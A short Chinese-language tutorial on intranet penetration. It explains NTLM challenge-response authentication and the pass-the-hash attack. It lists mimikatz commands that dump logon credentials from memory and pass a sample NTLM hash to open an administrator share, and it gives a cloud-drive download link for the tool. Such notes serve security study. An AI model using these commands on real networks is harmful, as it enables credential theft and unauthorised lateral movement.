内网渗透 / 哈希传递

内网渗透

流程

1.提权

实际情况下拿到的用户一般为程序用户

大部分提权是基于溢出漏洞的提权（缓冲区溢出）

2.横向移动

手段：哈希传递

哈希传递

NTLM

NTLMhash

使用NTLM（NT LAN Manager）算法对用户密码进行哈希处理得到 NTLMhash

NTLM 协议

用于远程登录认证

NTLM 认证流程

1. client 将账户名传递到 server

2. server 判断本地账户名是否存在，没有则失败

   如果存在，生成 challenge，查找 user 对应的 NTLM 哈希，使用哈希加密 challenge，生成一个 net-NTLM，存储在内存中，并将 challenge 发送给 client（挑战-应答机制）

3. client 接收到 challenge 后，将自己的密码转换为 NTLMhash，用NTLMhash 加密 challenge，生成 response，将 response 发送给 server

4. server 比较 net-NTLM 和 response 是否相同，相同则登陆成功，否则登陆失败

哈希传递攻击

hash 传递攻击成功的前提：要攻击的主机和失陷的主机密码相同

情景

• 攻陷了一台主机后抓不到该主机的明文密码

• 失陷主机和局域网内其他主机存在相同密码

攻击原理

攻击者猜测要攻击的主机和失陷主机的密码相同（并且需要发送正确的账户名请求），server 验证用户名正确后返回 challenge，使用失陷主机的 NTLMhash 加密接收到的 challenge，返回给 server，如果 server 上用户的密码和失陷主机上的用户密码相同，则可以成功登录

攻击程序

mimikatz 猕猴桃

链接：https://pan.baidu.com/s/1Iz1pt3-eiuAV4S0wQMOVVA?pwd=9mfs
提取码：9mfs

前提：成功提权

privilege::debug                            提升权限(注：需以管理员权限运行)
sekurlsa::logonpasswords          			获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:test.com /ntlm:a803cf45d87009c404eb89df4b1ae94c
弹出新窗口
dir \\10.10.10.254\c$

pth：Pass the hash 哈希传递

自动扫描内网存活的主机，自动对存活主机进行哈希传递